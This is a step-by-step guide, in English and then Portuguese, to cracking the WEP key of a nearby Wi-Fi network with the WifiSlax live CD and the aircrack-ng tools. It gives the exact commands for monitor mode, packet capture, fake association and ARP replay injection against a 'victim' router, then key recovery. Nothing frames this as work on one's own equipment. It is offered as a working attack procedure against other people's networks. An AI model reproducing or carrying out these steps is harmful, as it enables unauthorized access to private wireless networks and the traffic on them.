WiFiSlax WEP Hack Steps

1. Download Wifislax from the official page.

2. Burn the downloaded .iso into a CD in order to boot it.
3. Reboot the computer (if necessary) and boot it.
4. Press Enter when necessary.
5. Elect the option no pcmcia and press Enter.
6. Introduce root as user and toor as password in order to login.
7. Introduce now startx to start the operative system in graphics mode.
8. Go to Start> Wifislax> Asistencia Chipset> Asistencia intel pro wireless> Cargar ipw3945
inyección - ipwray-ng; to start injection mode. The system must detect now 2 more network card
interfaces: wifi0 and rtap0.
9. Write in the Shell that have just appeard airodump-ng wifi0.
10. Take a look of which WEP encrypted network (ENC category) has more Beacons and pay
special attention on what channel it is (CH category) and what's it's name (ESSID category). That
will posibly be the network with more signal received.
11. Press Ctrl+C and introduce airoway.sh.
12. Move with the cursor to the channel of the wanted network and press Enter when the wanted
network appear.
13. Elect the network with the number it has associated.
14. Press number 2. There will appear some information refered to an association. If you succeed
there will appear this: Association successful :-).
15. Press number 3. There will appear some information refered to a reply.
16. Now wait till the attack 3 (the step told just before) comence to catch ARP's and #Data category
reaches 30000.
17. Press number 8 when you have collected the required Data. There will appear some red letters
and numbers. If you succeed it must appear a KEY FOUND down in the window.
18. Write in a piece of paper both keys (HEX and ASCII respectively).

Tips
• Pay special attention to the Encryptation of the network, it must be WEP not WPA.
• Sometimes the #Data needed is superior to 30000 packets. Sometimes 1000000 packets are
necessesary to crack the key.
• To know if your computer possesses the chipset IPW3945 you can execute the command
ipconfig /all in Windows' MS-DOS. You have to look for Intel PRO/Wireless 3945ABG Network
Connection. In other operating systems like Linux-based ones, you can download programs like
hardinfo to obtain a complete list of the hardware of your computer, where it would be included
the chipset of your NIC. This chipset is very common on laptops.
• If attack 2 (when you press number 2) don't succeed, you have to try again later or crack another
network.
• The liveCD of Wifislax sometimes crashes or doesn't recognize the injection interfaces. The
solution to this is rebooting the operating system.

Things You'll Need

• A computer which NIC has IPW3945 as chipset.
• Wifislax 3.1 burned in a CD.
• A computer able to boot liveCD's
###################### OUTRO #########################

(1) No Windows, utilizar o Netstumbler ou InSSIDer para saber da rede

- SSID
- endereço MAC
- canal

(2) No WiFiSlax, ver que placa de rede a utilizar

iwconfig

(3) Iniciar modo monitor no canal 1

airmon-ng start wlan0 1

(4) Grava para o ficheiro f1, sobre o canal 1, os pacotes retornados

airodump-ng –w f1 –c 1 wlan0

(5) Criar a associação entra a placa de rede e o router da rede

aireplay-ng -1 30 –e BSSIDVitima –a MACVitima –h MACNosso wlan0

(6) Injectar pacotes no router da vítima

aireplay-ng -3 –x600 –b MACVitima –h MACNosso wlan0

(7) Aguardar que capture, pelo menos, >100000 pacotes

(8) Numa nova shell, iniciar o crack

aircrack-ptw f1-01.cap
###################### OUTRO #########################